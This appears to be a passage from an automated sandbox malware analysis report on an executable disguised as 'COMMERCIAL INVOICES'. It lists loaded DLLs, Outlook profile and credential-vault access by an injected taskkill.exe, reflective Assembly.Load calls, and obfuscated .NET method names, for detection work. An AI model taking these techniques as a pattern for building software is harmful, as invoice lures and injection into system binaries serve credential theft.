Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Section loaded: iconcodecservice.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: framedynos.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: dbghelp.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\taskkill.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: COMMERCIAL INVOICES.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: COMMERCIAL INVOICES.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oKWoZthfkV.exe, 00000005.00000000.2455201096.000000000006E000.00000002.00000001.01000000.0000000C.sdmp, oKWoZthfkV.exe, 00000009.00000000.2612639355.000000000006E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2544070820.0000000004812000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2546119933.00000000049C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: COMMERCIAL INVOICES.exe, COMMERCIAL INVOICES.exe, 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, taskkill.exe, 00000006.00000003.2544070820.0000000004812000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2546119933.00000000049C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: taskkill.pdbGCTL source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544022936.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000003.2594309424.000000000121B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: taskkill.pdb source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544022936.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000003.2594309424.000000000121B000.00000004.00000001.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, SV9D1XeqHF0diChIWw.cs | .Net Code: pVhW1XjiX8 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, SV9D1XeqHF0diChIWw.cs | .Net Code: pVhW1XjiX8 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, SV9D1XeqHF0diChIWw.cs | .Net Code: pVhW1XjiX8 System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_02BA4658 push edx; retn 0002h 0_2_02BA465A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_02BA47B0 push esi; retn 0002h 0_2_02BA47B2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 0_2_02BA4779 push esi; retn 0002h 0_2_02BA477A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_004030C0 push eax; ret 4_2_004030C2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_004118F6 push esp; retf 4_2_004118F7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_004048FD push edx; retf 4_2_00404913
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0040D094 push esp; retf 4_2_0040D095
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00404979 push ebp; retf 4_2_0040497D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00404903 push edx; retf 4_2_00404913
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00404ACD push ebx; retf 4_2_00404B02
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00408370 push ebp; retf 4_2_00408376
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00405B15 push eax; retf 4_2_00405B16
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00404B85 push es; iretd 4_2_00404B9E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00401B88 push es; ret 4_2_00401B89
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00413CF5 push es; iretd 4_2_00413CF9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0041349C push ecx; iretd 4_2_0041349D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00413ED9 push esi; retf 4_2_00413EDA
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_0040CE88 push FFFFFFDCh; retf 4_2_0040CE9A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_00415783 push esi; ret 4_2_00415787
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe | Code function: 4_2_012409AD push ecx; mov dword ptr [esp], ecx 4_2_012409B6
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04B727FA pushad ; ret 6_2_04B727F9
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04B7225F pushad ; ret 6_2_04B727F9
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04B7283D push eax; iretd 6_2_04B72858
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_04BA09AD push ecx; mov dword ptr [esp], ecx 6_2_04BA09B6
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_00873750 push esp; ret 6_2_008737E5
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_0085E833 push esp; retf 6_2_0085E834
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_00852A52 push eax; retf 6_2_00852A53
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_0086512B push eax; ret 6_2_0086512D
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_008552AD push ebp; retf 6_2_008552B3
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_008518B6 push ebp; retf 6_2_008518BA
            Source: C:\Windows\SysWOW64\taskkill.exe | Code function: 6_2_0085183A push edx; retf 6_2_00851850
            Source: COMMERCIAL INVOICES.exe | Static PE information: section name: .text entropy: 7.868773952918643
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, nYtUVc1f98ph2ybXswK.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Jx1qryY890', 'XuCqNpD15F', 'P9vqQlExPp', 'bWiqISOkpL', 'OMEqm360PR', 'fBhq9lsU0J', 'QxKqK0sAxB'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, bUWG7PgKOhSfiEeOT7.cs | High entropy of concatenated method names: 'man6st8OIQ', 'Pwx6x6veYd', 'Y1H6tLF3LS', 'FtK6P0Y4Jd', 'OP56wXncPy', 'PnT6BrqIAB', 'jUe6aSbjn7', 'bmt67T9EFI', 'aub65pxFQP', 'ucv60Ly8ct'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, qrSvWW10fNhaTHKXDHV.cs | High entropy of concatenated method names: 'AbXJYlNUjP', 'h9ZJZHS6KX', 'MuxJ1lOHa9', 'RiiJcG8FyC', 'yR1JgRo2nQ', 'H1PJSW7a1p', 'OtKJHRIUqC', 'eWfJoQS6UF', 'h5lJif5xkP', 'VNqJb9whlv'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, SV9D1XeqHF0diChIWw.cs | High entropy of concatenated method names: 'z0HMTFlSUr', 'MR6MsnJ8rF', 'xWYMx5IHZh', 'Ac1MtCT7Ip', 'pv7MPulKDj', 'E77Mwj6KIh', 'aoIMBc3EhS', 'JcdMaWCEZ5', 'sm8M75YPYc', 'OHpM5waVXP'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, xpvY8rRaUE3whfWfo7.cs | High entropy of concatenated method names: 'IYCJuJ53qc', 'ttOJMnuq7J', 'FC6JWlvBtf', 'oiWJsHZGQC', 'H4AJxgnRbg', 'ghYJPZjEdh', 'c35Jw5OsNV', 'gFR6KXPGUR', 'TKr6Onp9l0', 'NOj6CXKC0D'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, RUACNAEq3joZFW6PJt.cs | High entropy of concatenated method names: 'Fie6pqgy9M', 'kfY6E2udxm', 'S4E64Zf12O', 'bFj68J5n5j', 'EMj6rMddfu', 'vAC6RaGEup', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, klUv3e7OgOX75n6OJS.cs | High entropy of concatenated method names: 'KNuVD0TCOW', 'poRVlvLCaa', 'E6OVrvkPTO', 'Q8iVNs1c5f', 'iOUVE3AAHS', 'O0VV4JMQPe', 'lqpV80sLqF', 'RnMVRiqmRb', 'dWqV2mHHgF', 'eYCVnCNDbE'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, q598vXWMJVqmSJ4TcV.cs | High entropy of concatenated method names: 'UCsxrkPEMW', 'nIsxNe8PLI', 'a0kxQOgJCY', 'RmrxI3IOoX', 'mJKxm9RMUc', 'gf9x9D9UT0', 'YJgxKdQD5y', 'LuOxO2BDha', 'D6MxC8ahrb', 'R5uxU2OppS'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, U4MZBR8NwmLOtx27mp.cs | High entropy of concatenated method names: 'KSxBsSZo5a', 'F77BtyOXKd', 'SZDBw2upF5', 'jq7wUl1HIv', 'kkOwzGdA9p', 'q8UBvQE2bX', 'VJTBuJYrpg', 'CQ2BhDerR4', 'XiVBMusDi5', 'StoBWdlbrW'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, XYbpMIyCGhf593orlY.cs | High entropy of concatenated method names: 'PxaBYvQDX7', 'yuMBZF3huP', 'HSWB1FnJnl', 'ic4BcNp7LS', 'cwRBgFUhr4', 'UQcBSubIIv', 'CAqBHFDplY', 'VQLBoara1K', 'Q4JBiT93f4', 'hU0Bb3nMay'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, e9ABKXtgEBCcdDS8fM.cs | High entropy of concatenated method names: 'xL5tcmfO3X', 'X21tShyPBo', 'mX5toaS448', 'hJttiiFk3y', 'NVYtVyHnNQ', 'c4LtfShvQx', 'aCQtXIL0NB', 'J2Lt6KwM5H', 'yT0tJh9qlL', 'vxotqfZ6J4'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, HdBXwX4EpLlOYfjryw.cs | High entropy of concatenated method names: 'ToString', 'uqBfj3Fcx9', 'FlFfEoFwc0', 'JBrf4TPPGw', 'BtIf8HTXnc', 'adkfRt3Gv9', 'M2Kf2B8ofp', 'aeVfnmkEau', 'xmhfelm3U9', 'jgyfLi4JFD'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, vVQ4gmc6IjLKXDHf3D.cs | High entropy of concatenated method names: 'DWBuBAJsvi', 'WU1uaxTE6J', 'wM0u5biAWJ', 'YR2u0FdaQH', 'NgfuVUhBHV', 'fD5ufQGZW7', 'kQ9nNDoFkVfhwIDgkh', 'CpC7dGafPMOb5v1q3h', 'vmWuuZ7Ury', 'GJQuMCT3vX'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, bZLr5dIHP2nUPnA0nI.cs | High entropy of concatenated method names: 'e7l3oEvGWF', 'VkF3isbbId', 'Lbp3poTr2I', 'noI3EJdbtN', 'ni638KEe49', 'JMv3RVHd6F', 'MvL3noDxg6', 'Xpw3enkPMc', 'RDG3DqnTm5', 'QgQ3jQN6Ae'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, hCECRwYOSLpQCB6qx8.cs | High entropy of concatenated method names: 'Dispose', 'db0uCoLTDK', 'HJhhEY60Yy', 'vbBGGIuivj', 'iVquUrRUbY', 'zrouzZVo3O', 'ProcessDialogKey', 'o75hvE2KVf', 'O2yhubl4U7', 'aIlhhISAqc'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, DP8bVlHOj0ljQyuNZ6.cs | High entropy of concatenated method names: 'DwM1LQccj', 'gqacVfQiQ', 'mZ0SIRdh2', 'MrKHZUSrL', 'h52iCbKBK', 'xDIbTLV2I', 'fes4AsrBk4NeLGy4HX', 'TNmov7pPSAZSb3p8EJ', 'KCo675m0M', 'o5aqajBcS'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, mfFkuJ5rWwRdGwBJMS.cs | High entropy of concatenated method names: 'b3oXO9p1br', 'VPBXU2KLRw', 'DLQ6v5qrnl', 'wTi6ugBjTF', 'FUNXjhFKwd', 'uoZXl5Gxu1', 'oWiXkaF79M', 'trBXry3OlA', 'gU1XN83UQp', 'egWXQdFNQL'
            Source: 0.2.COMMERCIAL INVOICES.exe.8c70000.5.raw.unpack, YLPLgdjdRFYqApV2un.cs | High entropy of concatenated method names: 'VEAwTwV7KA', 'DPdwxJcfYI', 'wUAwPCBiiy', 'hcNwBuIeRo', 'nCrwaH0UWV', 'gL0PmiBmLr', 'kk9P9mNmwH', 'lkwPKLItZ4', 'pF9POLTZeg', 'PxpPCo3ysx'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, nYtUVc1f98ph2ybXswK.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Jx1qryY890', 'XuCqNpD15F', 'P9vqQlExPp', 'bWiqISOkpL', 'OMEqm360PR', 'fBhq9lsU0J', 'QxKqK0sAxB'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, bUWG7PgKOhSfiEeOT7.cs | High entropy of concatenated method names: 'man6st8OIQ', 'Pwx6x6veYd', 'Y1H6tLF3LS', 'FtK6P0Y4Jd', 'OP56wXncPy', 'PnT6BrqIAB', 'jUe6aSbjn7', 'bmt67T9EFI', 'aub65pxFQP', 'ucv60Ly8ct'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, qrSvWW10fNhaTHKXDHV.cs | High entropy of concatenated method names: 'AbXJYlNUjP', 'h9ZJZHS6KX', 'MuxJ1lOHa9', 'RiiJcG8FyC', 'yR1JgRo2nQ', 'H1PJSW7a1p', 'OtKJHRIUqC', 'eWfJoQS6UF', 'h5lJif5xkP', 'VNqJb9whlv'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, SV9D1XeqHF0diChIWw.cs | High entropy of concatenated method names: 'z0HMTFlSUr', 'MR6MsnJ8rF', 'xWYMx5IHZh', 'Ac1MtCT7Ip', 'pv7MPulKDj', 'E77Mwj6KIh', 'aoIMBc3EhS', 'JcdMaWCEZ5', 'sm8M75YPYc', 'OHpM5waVXP'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, xpvY8rRaUE3whfWfo7.cs | High entropy of concatenated method names: 'IYCJuJ53qc', 'ttOJMnuq7J', 'FC6JWlvBtf', 'oiWJsHZGQC', 'H4AJxgnRbg', 'ghYJPZjEdh', 'c35Jw5OsNV', 'gFR6KXPGUR', 'TKr6Onp9l0', 'NOj6CXKC0D'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, RUACNAEq3joZFW6PJt.cs | High entropy of concatenated method names: 'Fie6pqgy9M', 'kfY6E2udxm', 'S4E64Zf12O', 'bFj68J5n5j', 'EMj6rMddfu', 'vAC6RaGEup', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, klUv3e7OgOX75n6OJS.cs | High entropy of concatenated method names: 'KNuVD0TCOW', 'poRVlvLCaa', 'E6OVrvkPTO', 'Q8iVNs1c5f', 'iOUVE3AAHS', 'O0VV4JMQPe', 'lqpV80sLqF', 'RnMVRiqmRb', 'dWqV2mHHgF', 'eYCVnCNDbE'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, q598vXWMJVqmSJ4TcV.cs | High entropy of concatenated method names: 'UCsxrkPEMW', 'nIsxNe8PLI', 'a0kxQOgJCY', 'RmrxI3IOoX', 'mJKxm9RMUc', 'gf9x9D9UT0', 'YJgxKdQD5y', 'LuOxO2BDha', 'D6MxC8ahrb', 'R5uxU2OppS'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, U4MZBR8NwmLOtx27mp.cs | High entropy of concatenated method names: 'KSxBsSZo5a', 'F77BtyOXKd', 'SZDBw2upF5', 'jq7wUl1HIv', 'kkOwzGdA9p', 'q8UBvQE2bX', 'VJTBuJYrpg', 'CQ2BhDerR4', 'XiVBMusDi5', 'StoBWdlbrW'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, XYbpMIyCGhf593orlY.cs | High entropy of concatenated method names: 'PxaBYvQDX7', 'yuMBZF3huP', 'HSWB1FnJnl', 'ic4BcNp7LS', 'cwRBgFUhr4', 'UQcBSubIIv', 'CAqBHFDplY', 'VQLBoara1K', 'Q4JBiT93f4', 'hU0Bb3nMay'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, e9ABKXtgEBCcdDS8fM.cs | High entropy of concatenated method names: 'xL5tcmfO3X', 'X21tShyPBo', 'mX5toaS448', 'hJttiiFk3y', 'NVYtVyHnNQ', 'c4LtfShvQx', 'aCQtXIL0NB', 'J2Lt6KwM5H', 'yT0tJh9qlL', 'vxotqfZ6J4'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, HdBXwX4EpLlOYfjryw.cs | High entropy of concatenated method names: 'ToString', 'uqBfj3Fcx9', 'FlFfEoFwc0', 'JBrf4TPPGw', 'BtIf8HTXnc', 'adkfRt3Gv9', 'M2Kf2B8ofp', 'aeVfnmkEau', 'xmhfelm3U9', 'jgyfLi4JFD'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, vVQ4gmc6IjLKXDHf3D.cs | High entropy of concatenated method names: 'DWBuBAJsvi', 'WU1uaxTE6J', 'wM0u5biAWJ', 'YR2u0FdaQH', 'NgfuVUhBHV', 'fD5ufQGZW7', 'kQ9nNDoFkVfhwIDgkh', 'CpC7dGafPMOb5v1q3h', 'vmWuuZ7Ury', 'GJQuMCT3vX'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, bZLr5dIHP2nUPnA0nI.cs | High entropy of concatenated method names: 'e7l3oEvGWF', 'VkF3isbbId', 'Lbp3poTr2I', 'noI3EJdbtN', 'ni638KEe49', 'JMv3RVHd6F', 'MvL3noDxg6', 'Xpw3enkPMc', 'RDG3DqnTm5', 'QgQ3jQN6Ae'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, hCECRwYOSLpQCB6qx8.cs | High entropy of concatenated method names: 'Dispose', 'db0uCoLTDK', 'HJhhEY60Yy', 'vbBGGIuivj', 'iVquUrRUbY', 'zrouzZVo3O', 'ProcessDialogKey', 'o75hvE2KVf', 'O2yhubl4U7', 'aIlhhISAqc'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, DP8bVlHOj0ljQyuNZ6.cs | High entropy of concatenated method names: 'DwM1LQccj', 'gqacVfQiQ', 'mZ0SIRdh2', 'MrKHZUSrL', 'h52iCbKBK', 'xDIbTLV2I', 'fes4AsrBk4NeLGy4HX', 'TNmov7pPSAZSb3p8EJ', 'KCo675m0M', 'o5aqajBcS'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, mfFkuJ5rWwRdGwBJMS.cs | High entropy of concatenated method names: 'b3oXO9p1br', 'VPBXU2KLRw', 'DLQ6v5qrnl', 'wTi6ugBjTF', 'FUNXjhFKwd', 'uoZXl5Gxu1', 'oWiXkaF79M', 'trBXry3OlA', 'gU1XN83UQp', 'egWXQdFNQL'
            Source: 0.2.COMMERCIAL INVOICES.exe.3edf6c0.3.raw.unpack, YLPLgdjdRFYqApV2un.cs | High entropy of concatenated method names: 'VEAwTwV7KA', 'DPdwxJcfYI', 'wUAwPCBiiy', 'hcNwBuIeRo', 'nCrwaH0UWV', 'gL0PmiBmLr', 'kk9P9mNmwH', 'lkwPKLItZ4', 'pF9POLTZeg', 'PxpPCo3ysx'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, nYtUVc1f98ph2ybXswK.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Jx1qryY890', 'XuCqNpD15F', 'P9vqQlExPp', 'bWiqISOkpL', 'OMEqm360PR', 'fBhq9lsU0J', 'QxKqK0sAxB'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, bUWG7PgKOhSfiEeOT7.cs | High entropy of concatenated method names: 'man6st8OIQ', 'Pwx6x6veYd', 'Y1H6tLF3LS', 'FtK6P0Y4Jd', 'OP56wXncPy', 'PnT6BrqIAB', 'jUe6aSbjn7', 'bmt67T9EFI', 'aub65pxFQP', 'ucv60Ly8ct'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, qrSvWW10fNhaTHKXDHV.cs | High entropy of concatenated method names: 'AbXJYlNUjP', 'h9ZJZHS6KX', 'MuxJ1lOHa9', 'RiiJcG8FyC', 'yR1JgRo2nQ', 'H1PJSW7a1p', 'OtKJHRIUqC', 'eWfJoQS6UF', 'h5lJif5xkP', 'VNqJb9whlv'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, SV9D1XeqHF0diChIWw.cs | High entropy of concatenated method names: 'z0HMTFlSUr', 'MR6MsnJ8rF', 'xWYMx5IHZh', 'Ac1MtCT7Ip', 'pv7MPulKDj', 'E77Mwj6KIh', 'aoIMBc3EhS', 'JcdMaWCEZ5', 'sm8M75YPYc', 'OHpM5waVXP'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, xpvY8rRaUE3whfWfo7.cs | High entropy of concatenated method names: 'IYCJuJ53qc', 'ttOJMnuq7J', 'FC6JWlvBtf', 'oiWJsHZGQC', 'H4AJxgnRbg', 'ghYJPZjEdh', 'c35Jw5OsNV', 'gFR6KXPGUR', 'TKr6Onp9l0', 'NOj6CXKC0D'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, RUACNAEq3joZFW6PJt.cs | High entropy of concatenated method names: 'Fie6pqgy9M', 'kfY6E2udxm', 'S4E64Zf12O', 'bFj68J5n5j', 'EMj6rMddfu', 'vAC6RaGEup', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.COMMERCIAL INVOICES.exe.3f674e0.2.raw.unpack, klUv3e7OgOX75n6OJS.cs | High entropy of concatenated method names: 'KNuVD0TCOW', 'poRVlvLCaa', 'E6OVrvkPTO', 'Q8iVNs1c5f', 'iOUVE3AAHS', 'O0VV4JMQPe', 'lqpV80sLqF', 'RnMVRiqmRb', 'dWqV2mHHgF', 'eYCVnCNDbE'
